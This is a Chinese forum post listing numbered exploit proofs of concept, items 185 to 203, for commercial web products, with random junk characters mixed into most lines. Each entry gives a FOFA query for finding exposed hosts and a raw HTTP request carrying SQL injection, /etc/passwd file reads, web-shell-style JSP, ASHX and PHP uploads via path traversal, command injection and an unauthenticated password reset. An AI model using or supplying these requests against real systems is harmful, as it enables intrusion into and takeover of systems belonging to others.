( l' m" q4 K- rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% n& g9 A; {5 j! i( _6 wX-Requested-With: XMLHttpRequest+ S5 k3 j7 g4 N( R
. m. l1 N _6 U( l
- T. F5 _4 W: q( ]+ s
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
1 c- \; E/ @' ^4 B" s( r3 \7 P& b) G, [( z5 u, R& i
5 S" |# h9 n( F" q# p+ E4 O% n
185. 瑞友天翼应用虚拟化系统SQL注入, w, K/ K2 v3 G2 I2 o8 C& n9 b+ o
version < 7.0.5.1
# z: \4 l9 z' _- T3 W: JFOFA:app="REALOR-天翼应用虚拟化系统"
' m0 y* Q8 U2 S2 nGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
e4 ^9 x1 H; H0 r* S6 b3 k% B5 wHost: host$ \0 t% H4 h0 N# k3 J* A- q8 G
! P% P% K/ y+ E7 ?* q6 _1 |
0 o2 _: W$ U9 b: L {) T$ D0 A/ R$ N186. F-logic DataCube3 SQL注入
x% b5 @* l' tCVE-2024-31750
2 z$ B5 `8 e1 \( ?: @9 `7 \F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
, e: D4 s. J: ]: hFOFA:title=="DataCube3"' }: T5 a) ~: y1 k
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
7 k/ I& T; e. B. O1 d: X' xHost: your-ip
4 h( ?. R$ L' l, [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
' K. Y: z5 \. jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
5 c. L8 y2 ~1 a8 U" X- f$ N7 hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% A e( ~9 o3 e2 LAccept-Encoding: gzip, deflate
! t+ J! h e+ F0 qConnection: close
6 d0 @% a2 Y: X% x3 q, t9 XContent-Type: application/x-www-form-urlencoded
8 W# j3 n5 N3 v7 k- A0 O: e/ L; _3 i P/ \- H; L
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14501 G# e0 n6 D3 A" z( K0 e
% O, | o! R4 S. E2 |! S5 P
. G5 B9 s! f6 \187. Mura CMS processAsyncObject SQL注入8 z! G2 s! k, T1 m
CVE-2024-326404 u" I9 l7 U2 v) L% h! [
FOFA:"Mura CMS"6 P6 ?6 d# L( K( B# q/ I3 {2 O t
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
# |3 ]' a: M1 C, J* t7 `4 VHost: your-ip! x% p7 X+ Z/ e: I. A; n |1 S# j0 {
Content-Type: application/x-www-form-urlencoded
7 V/ p9 S! D/ y6 E& r5 O& L) {7 ^& M }% e6 l
# [3 b9 p0 _2 f1 B6 nobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1+ k; i, h( ]+ Q+ V7 k" m4 [+ O4 H
- x9 ]# C: S" f/ q2 l$ g" B6 l' I0 X/ N) x! g* f5 p Q. `
188. 叁体-佳会视频会议 attachment 任意文件读取
+ _+ }; D' E* d* s i- Aversion <= 3.9.7/ n, @- C7 H4 I( t
FOFA:body="/system/get_rtc_user_defined_info?site_id"
" [- G; v5 U1 K) nGET /attachment?file=/etc/passwd HTTP/1.1# k/ z S+ o7 [ z# M0 v
Host: your-ip; x4 A9 w M; j7 v9 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
9 H$ F' [; D/ n6 ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 ]- w1 g- h9 g6 ]2 o9 HAccept-Encoding: gzip, deflate, z# M7 s+ Z6 F+ ^1 C3 ^% Y
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8) z4 ?' r3 }5 v& V
Connection: close
- j G: `3 M% K
' q& c! |6 p2 x* c6 y4 g: }0 A
7 F& y/ E8 h8 `- H0 V+ g c189. 蓝网科技临床浏览系统 deleteStudy SQL注入9 [! c( s' I1 L6 v1 u
FOFA:app="LANWON-临床浏览系统"
- o! \# {& T7 u. A, a! q. a' xGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
) `* {0 Z+ D8 S/ t- dHost: your-ip0 Z. w. E2 X+ F5 A/ z5 \
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
2 F9 @3 J2 F9 U; }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 l; M" P9 n# j* R& a
Accept-Encoding: gzip, deflate) q) x' \" ]3 Y! m/ ]4 ]( E
Accept-Language: zh-CN,zh;q=0.9
2 J+ z# a6 |/ R: l( r( AConnection: close
6 d" ]7 V( ?- |- o4 k. f3 z8 T! `8 S2 ]) \, ~# ^
% m2 Z, e" J" E% a. Q! r& C. D
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
4 E& m8 n3 n" e$ I: X& Q2 N; _FOFA:title=="短视频矩阵营销系统"$ g# O. l. d5 N3 _
POST /index.php/admin/Userinfo/poihuoqu HTTP/21 U5 g2 [0 x$ h/ }7 V: ]
Host: your-ip$ v* d. e, _, Q& p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
) P% V8 e; y4 i+ {! f) YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
! m( h' J3 x& g$ tContent-Type: application/x-www-form-urlencoded2 R( y. D) c( _% t4 q! z# `
Accept-Encoding: gzip, deflate
/ n# B$ j; \. m1 x" R( RAccept-Language: zh-CN,zh;q=0.9
8 w' o) [' F* U. f0 A
( i0 y) a- C4 X- R; Npoi=file:///etc/passwd4 Z2 G+ ]' h/ g0 } ?3 v4 Y3 y
$ F; q9 V& u w; U
7 ]' m) |: a: A9 i6 n
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入4 b$ i% v' i5 L5 `
FOFA:body="/CDGServer3/index.jsp"
( t3 y8 s: l# x2 y/ m: Q3 Z! x A3 d% JPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
4 N# k& C4 G& V/ {Host: your-ip& L5 Y8 o$ s7 }1 i' r; r8 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& i1 @: J# O2 j( XContent-Type: application/x-www-form-urlencoded% \( ^# C8 Z# f, U% |
2 z7 W3 m* v _" |& s' q: ?
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
3 p1 g9 D( a+ q
% n" D6 y5 F: d7 R; ]2 V+ C r' p. I. ?
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传/ u' v; G' R! R
FOFA:title="用户登录_富通天下外贸ERP"
! _) L. Z/ \4 k8 pPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1. j0 L% @) Z' {+ Q% Q& v# {- t
Host: your-ip
, b( g4 K9 W# o9 ?3 a) E, UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36# ^: h; O" s4 F
Content-Type: application/x-www-form-urlencoded( L: }4 B! L/ K% o9 V8 q$ ]
8 \. C! c5 j' f! f& r' `
* @+ s! x/ x' [1 o E! i0 F8 h& _<% @ webhandler language="C#" class="AverageHandler" %>, O4 { h) }- K% z V; w
using System;: B( i' ^1 f8 j+ J
using System.Web;
1 q1 q! n# _0 k2 c. v" Epublic class AverageHandler : IHttpHandler/ }3 ]8 `; B6 u5 S. }$ r" k- x& k( v
{' q) a- A- l( @( _
public bool IsReusable2 h6 O% ` h$ Q/ k/ G
{ get { return true; } }
0 V7 W, t! f, H2 mpublic void ProcessRequest(HttpContext ctx)4 B" [, K c6 ]& u3 K8 q) k! Q
{
& s: P$ p# B7 {) g# U% Vctx.Response.Write("test");
2 n+ b; i* B% f+ e/ a}
2 M# J; O: M% p4 V9 k, I: u/ A J0 H}7 L% ]+ Y) M3 k( y& j% }7 F5 d- Q
8 C9 v; R8 I$ E- a/ [! ], I
$ v1 D) f8 X' o9 {- |4 j9 {
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
3 A9 Q! C# E# Z. {; u6 W; cFOFA:body="山石云鉴主机安全管理系统"# Z& [* j# P9 M7 W+ J' k; C$ o
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
! q. x* u) o3 V) u0 `* @Host:1 M* P4 I; _) Q% z# W0 i
Cookie: PHPSESSID=2333333333333;- b* E* C. @2 Y; h7 }2 p7 }
Content-Type: application/x-www-form-urlencoded, ^3 Q, v3 R" [3 {: E
User-Agent: Mozilla/5.0
. a ~% n' `. r/ {; g; j( l: R# G _, b
' F4 v6 p& x" L, e6 e8 K# _, TPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
, ?" i% i1 L" RHost:( D& q* G8 c3 t8 S7 B$ ^
User-Agent: Mozilla/5.0
% _ F' \+ V* ^! ~$ uAccept-Encoding: gzip, deflate- { I" [$ ` A
Accept: */*% R7 U6 j7 y. g; M
Connection: close
2 `- e. M+ }# b% SCookie: PHPSESSID=2333333333333;
/ _4 r* p: j) T( N5 a1 {$ l& a% lContent-Type: application/x-www-form-urlencoded3 ~, Q2 R% Y4 j2 v% E2 B
Content-Length: 84
* Z7 S! l/ K7 l. z f' j; u# M4 v8 J( a% k* o' x6 [
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
, e T- F2 D! \
6 K* B) D ~" g* p
& ^' ?& L" Z8 x e8 b/ \; ? A3 UGET /master/img/config HTTP/1.1
' n5 } D/ ~0 \( `' n W3 m" b6 eHost:
& P+ K$ o! {* V* _5 cUser-Agent: Mozilla/5.0
; c. W0 g$ X/ x2 Q( ?: E, ?
# @* z' v* U2 ]
- A: J1 E4 M8 a/ [194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传% E2 j& v- Y# @
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在5 \1 z/ Y! t$ h2 K* S$ l! }3 _
( }) e9 j2 c2 N7 t
POST /servlet/uploadAttachmentServlet HTTP/1.1
9 q: H- Z8 [2 LHost: host
* t# k7 G1 { @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
" T5 ]7 ^ c. c' @& KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: c0 l c+ |8 \3 t6 [, O/ q( AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; @! h8 `' v; x! |2 p! Y; W) AAccept-Encoding: gzip, deflate- \6 G1 B0 Q+ c
Connection: close
" f( S! v1 `4 q- c4 EContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk- X s: T3 _& Y2 O
------WebKitFormBoundaryKNt0t4vBe8cX9rZk4 ]$ q' M* w9 o# M! d* s
2 f5 l, z8 T! Z! J1 [- y9 cContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
+ g& d1 C+ y' K, p0 i6 E# A2 Z YContent-Type: text/plain% K+ z0 j6 I$ w
<% out.println("hello");%>$ N. G6 M6 q8 ~
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
/ A- d. K, q& U% ~* L' lContent-Disposition: form-data; name="json"; t0 H- i4 ^$ \' x/ B
{"iq":{"query":{"UpdateType":"mail"}}}; V$ z$ p) V' k8 {
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--* ~* N8 c) T' H' A6 ?
7 a1 \+ Q A+ N3 x9 q0 g3 f
0 c A4 `/ K( o2 H$ v
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行2 @+ J+ L3 j/ ?% x. A b
FOFA:title=="飞鱼星企业级智能上网行为管理系统" p" p5 Z) ^' c5 j% F
POST /send_order.cgi?parameter=operation HTTP/1.1# B, a* g& \- o5 @3 f
Host: 127.0.0.1
5 {+ [) r" W) a& [4 g+ l; LPragma: no-cache5 P" x" C" V! h: T+ [
Cache-Control: no-cache5 a+ O1 M: y+ Y2 I) j3 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36: C2 ^: W$ }8 X# w
Accept: */*
+ G. ?# a3 n# J" y' K7 YAccept-Encoding: gzip, deflate/ J9 c& S( a% N. X& x0 O/ o V# U
Accept-Language: zh-CN,zh;q=0.9
4 J7 s3 D1 W! lConnection: close
( W* ~% j3 e" c9 N3 b. R/ B' ~! jContent-Type: application/x-www-form-urlencoded
* J/ @7 N. M0 R$ ?3 d1 ~Content-Length: 687 V& h' ]6 Q7 R; f6 t
8 I3 P. L, ?" H) A{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}8 X) f$ v5 A- G% X; v2 C. c6 M2 ~
5 Q) @4 L @/ y6 _/ d! W/ ^
5 }, [: X3 i9 v; q4 i/ v" F196. 河南省风速科技统一认证平台密码重置
4 F9 [* x3 R/ W N( SFOFA:body="/cas/themes/zbvc/js/jquery.min.js") Q/ j' o$ `, T/ o0 ?( x5 H" O
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1* k) j" B/ ]5 o+ h" j3 F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
3 G$ t I1 Q1 p- ~& X2 ]Content-Type: application/json;charset=UTF-8
, S+ ?, N# L7 cX-Requested-With: XMLHttpRequest9 ]* x2 P9 v0 T4 N7 r/ R, J
Host:6 y6 {9 P; R2 k* S7 c" n. Q9 q
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
! l7 }+ D! i1 `. _. K5 XContent-Length: 45
+ w9 t: n% ~0 B. bConnection: close0 K" y. x5 _9 P3 b/ Q- j p
F9 v& K5 _+ U# N! i
{"xgh":"test","newPass":"test666","email":""}! d; `7 U: L, N/ @- S& R! O: X5 O
5 k7 }0 H \: C. h& u- D. c
0 l8 Q7 n( @; e9 c2 ]0 A1 K' Z# b7 _% J% ^
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
: s% @- O ^% kFOFA:app="浙大恩特客户资源管理系统"
; ^9 q9 s( ~2 J- a& qGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
: w! s0 o5 P4 v3 F0 ?* V9 pHost:5 \* D; p0 S9 n; R$ M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
; U J0 L5 v9 `1 A7 @Accept-Encoding: gzip, deflate- @4 G& e6 a/ }6 t0 X5 _
Connection: close
. K* e* a" c. i* L3 D! I+ ]" B) U) b! z
3 z2 p$ C5 I" u% q Z
1 \, b& H; ]! I& m
198. 阿里云盘 WebDAV 命令注入" C G# [; Q9 s! F
CVE-2024-29640
+ G! N1 @' w NGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.12 A: b8 w6 a: g* Q; t' G4 \4 l
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf643 L& z3 p. r+ m) ~# \8 [
Accept: */*8 {, ^$ d2 _/ O% E+ {; q3 ~! \
Accept-Encoding: gzip, deflate {* M3 z/ Q5 z o
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
+ v1 U# \& U% F5 K: w( k- dConnection: close
1 ?' }* V0 z; e( F5 }4 c2 ~& q0 Q: i+ L& P
: l' g( F0 U8 }1 ~$ Z
199. cockpit系统assetsmanager_upload接口 文件上传) K5 m( j% @2 F# Q. w U
. @) n; J2 F6 {0 @8 k: P' x2 P2 K9 ~
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
" c7 p1 K1 ?( m4 u: y6 q7 Q2 i, rGET /auth/login?to=/ HTTP/1.1; _6 [" j+ W& p% x8 w# u- C$ z
4 m6 A+ w! ]% G$ c
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
' K4 L$ B# @6 A% V7 @- @
! i p D9 ^: f' r' g( l2.使用刚才上一步获取到的jwt获取cookie:
7 F: Y" T2 E- A8 I$ Y ~& x( O) V4 t
POST /auth/check HTTP/1.1
. u* U0 L; ?& Z0 ZContent-Type: application/json
3 b$ E3 v4 }7 m
7 N% g4 i% z" }% P' Y O/ e, _{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}- e" T! U! r- S5 S) [& F8 W0 l/ V
: c$ b% r; H$ J0 E& z响应:200,返回值:: E& x+ P' m; w3 [. {) W
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/) U# F+ z9 R O
Fofa:title="Authenticate Please!"
" f/ C9 v2 m, H/ f6 SPOST /assetsmanager/upload HTTP/1.1% j' v5 o; z- V }8 q: D! W
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
% |2 p1 V1 ]7 N+ x# t% K$ hCookie: mysession=95524f01e238bf51bb60d77ede3bea92
# Z ?9 n6 d' @
, x* h% l5 T6 E( F3 I% m-----------------------------36D28FBc36bd6feE7Fb3
& x" _) E0 Z' V5 \) C# Z) qContent-Disposition: form-data; name="files[]"; filename="tttt.php"; ~% ^0 y( p; h
Content-Type: text/php/ u9 i9 _. N3 X: I' x1 t* e! C% x
6 `6 |, k. D& X7 b& w
<?php echo "tttt";unlink(__FILE__);?>
3 c& D, B& `4 S-----------------------------36D28FBc36bd6feE7Fb3) o2 p3 a; ^5 M) ^, z
Content-Disposition: form-data; name="folder"
* w6 z" t) g4 h/ _" w+ a$ @* I0 h4 N( s) ?8 Q. ~
-----------------------------36D28FBc36bd6feE7Fb3--2 {5 ~% q- }( U/ _, G
: w" }& b% L+ D& O
/ Z1 X; i/ Q2 l; k; L+ S3 a% r
/storage/uploads/tttt.php* ?& E, x) Q! f( }9 d0 q: Q2 _# R
3 E# N" k/ E3 t200. SeaCMS海洋影视管理系统dmku SQL注入6 E- t! a* B& A: M* H. X
FOFA:app="海洋CMS"
7 p( ]1 {$ G5 y8 |$ l+ C/ w0 RGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
% v3 e) g0 q+ {/ tCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
7 L, }* o& n2 F1 ]1 I" Q) YUpgrade-Insecure-Requests: 1$ y' |% Q/ g6 f) o
Cache-Control: max-age=0: [6 i$ h7 T [# g( a' L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* M+ J4 q$ U3 x- H- k/ LAccept-Encoding: gzip, deflate
i0 D8 w9 [7 y/ XAccept-Language: zh-CN,zh;q=0.9
$ @; J8 Q8 e) B) O( a" f. `% [/ R _0 z
, Q1 O9 C# ?, z* K( j9 \201. 方正全媒体新闻采编系统 binary SQL注入* f$ U" H% J$ e
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
4 C/ ^! P% Z( ^POST /newsedit/newsplan/task/binary.do HTTP/1.1
n0 m. N1 Z* d# ^Content-Type: application/x-www-form-urlencoded
8 |4 n" |5 e& MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, c- w3 i$ r6 n9 O; D u, EAccept-Encoding: gzip, deflate
, E, A# w2 F+ G5 j \& f1 IAccept-Language: zh-CN,zh;q=0.9" w( l7 z' ?' m w) y# z
Connection: close% Q& g* {1 v1 z. L8 Z' k$ A m
: \! `, f& J1 i9 Y, Y* qTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
/ m+ {7 N& n8 G7 t; v8 p) ?% l9 S2 s# |7 L! w: M" I( {& \6 \
, w2 C5 r7 S3 Y; p$ |
202. 微擎系统 AccountEdit任意文件上传
( D/ i1 H1 f# J0 B4 kFOFA:body="/Widgets/WidgetCollection/": o: Y' B5 S; e
获取__VIEWSTATE和__EVENTVALIDATION值4 M% b# W$ p6 R& j
GET /User/AccountEdit.aspx HTTP/1.1, n8 T5 L" f! B/ Z+ U
Host: 滑板人之家/ w& n1 \6 l x9 q, q) g4 I8 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31# \5 V3 S7 M) V) C( g: Z4 Z/ c
Content-Length: 0
" o/ K: S [' U: Q7 T" t: V A. f' t# t
. [2 E }% V0 j C, W4 g& m+ r替换__VIEWSTATE和__EVENTVALIDATION值* y/ I6 r/ R/ w7 c
POST /User/AccountEdit.aspx HTTP/1.1
! M. G' W t7 q! |4 W- [, A% d$ uAccept-Encoding: gzip, deflate, br/ P2 H; Y: A& z8 H" r
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
4 G" R. ?7 W3 A! }, p6 m3 @
4 F& u& O" n: n/ j! E-----------------------------786435874t38587593865736587346567358735687
. h3 v& I0 ?7 K% k: \: @' Y* h1 zContent-Disposition: form-data; name="__VIEWSTATE"' @' F, ?6 D5 a7 m5 U9 O
4 G% L% M8 Q( D$ |/ A" b1 s+ e( s__VIEWSTATE3 ]$ W/ j4 j9 [) \% A: E' P* d
-----------------------------786435874t38587593865736587346567358735687
2 w$ c: e. v7 u3 p& B6 s" sContent-Disposition: form-data; name="__EVENTVALIDATION"* p* s7 A: e9 A$ ^2 T- O7 I- D5 V
, Z" }9 K0 i$ C__EVENTVALIDATION
# Z1 _; r4 z" _) x9 H; [-----------------------------786435874t38587593865736587346567358735687+ Q! G: e& c- g1 O
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"0 r3 W/ \5 ^4 J- T3 ]7 O! Q$ P
Content-Type: text/plain
( M. F& K4 F2 x' P0 o3 H% y' g9 g# Y, r9 l( V, L
Hello World!% b8 G) x% e" Y, c/ ?4 m
-----------------------------786435874t38587593865736587346567358735687+ f* F9 t# R7 R. b
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"- V: L* }+ C/ Q
5 Z( T; t! c) g上传图片
! t$ a. o; ~* t6 {. d-----------------------------786435874t38587593865736587346567358735687
9 X: z: N" B2 l% n" q( H$ wContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"3 F4 V! k5 w- L# ]- N1 q! P, A
; _/ n+ n+ r: R7 j+ r* i7 _7 B
5 @, u n: W1 O! x3 r3 s-----------------------------786435874t38587593865736587346567358735687
?+ U- S- R+ eContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
- k% k3 ^1 X8 C& ^1 O2 e9 O
3 ]( u" c% g4 p+ l) {+ N6 b. w) u: S6 a) _: d! M
-----------------------------786435874t38587593865736587346567358735687--3 s" P2 @- X8 V( ]5 s) F
6 F1 v% k' U1 z- h0 x4 [" o9 w! K4 ?, W4 w1 ?
/_data/Uploads/1123.txt
( D4 O3 H% p m, ?; W& _ u4 n/ B" X: i( ]' ~5 V) O
203. 红海云EHR PtFjk 文件上传
: C7 |2 b8 E. O$ `8 d" AFOFA:body="RedseaPlatform"6 n& f5 g3 t9 q4 L3 `# l Q
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
4 Z$ Q! C9 A1 l) xHost: x.x.x.x4 c' L' I# w; T0 v
Accept-Encoding: gzip5 j2 z/ |) K7 o6 T R3 x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! B8 r& p: c0 Z" F7 ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
m% U6 p; u( B" yContent-Length: 210
5 Q: S/ i$ f; a! R: U7 w, A+ u# h- R7 _# H8 V8 D* A, w
------WebKitFormBoundaryt7WbDl1tXogoZys4
+ F6 D0 @1 p9 Y( e6 m& \9 NContent-Disposition: form-data; name="fj_file"; filename="11.jsp". Z% ^( E& @8 S7 M3 X5 _4 |1 k) ?
Content-Type:image/jpeg
8 P. q( ^* A; `1 C2 w0 V8 v/ ?
% T; @& P: t9 {* Z/ ^, R& D<% out.print("hello,eHR");%>
0 q2 M' G9 K2 B) n------WebKitFormBoundaryt7WbDl1tXogoZys4--0 Q9 S. k& |# O# n" U( O. G
- V8 i+ s+ q% H$ g& V" a5 f9 D 3 H F# r ]* ?4 A. g
; a( Z+ I X! K. z& g- G
" O' w8 w! ]9 F+ E
! h% h' s4 P4 Q
2 z8 F7 g8 f2 Q6 V! Q3 ^. a! {) f |
发表于 2024-6-5 14:31:29
收藏
支持
反对